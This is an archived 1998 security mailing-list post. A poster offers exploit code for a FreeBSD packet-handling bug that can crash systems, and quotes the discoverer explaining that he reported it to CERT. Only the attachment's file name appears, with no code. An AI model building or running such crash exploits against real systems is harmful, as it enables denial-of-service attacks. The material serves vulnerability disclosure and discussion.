Here is some exploit code I wrote a while back. It hardly ever crashes BSD because the conditions required for the bug to work are out of our control.

Jeff

On Thu, 24 Dec 1998, Guido van Rooij wrote:

> On Wed, Dec 23, 1998 at 11:17:48AM +0100, Ulf Munkedal wrote:
> > Have I missed something on the list lately about these illegal packets that
> > CERT are addressing ("constructing a sequence of packets with certain
> > characteristics, an intruder can cause vulnerable systems to crash, hang,
> > or behave in unpredictable ways")?
> >
> > Or is this just the old teardrop/newtear/boink/bonk/nestea2 problem that
> > they are talking about?
> >
>
> No. This is an entirely new problem. It was discovered by me after a bug
> report for an SMP FreeBSD system. Since I know it is only a matter
> of time before such a bug would be abused, I decided to inform
> CERT (also because the problem has been present since at least the
> BSD Net/2 release). No public exploits are known to me.
>
> -Guido

Attachment: freebsd-mbuf-crash.c
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:26:32 PDT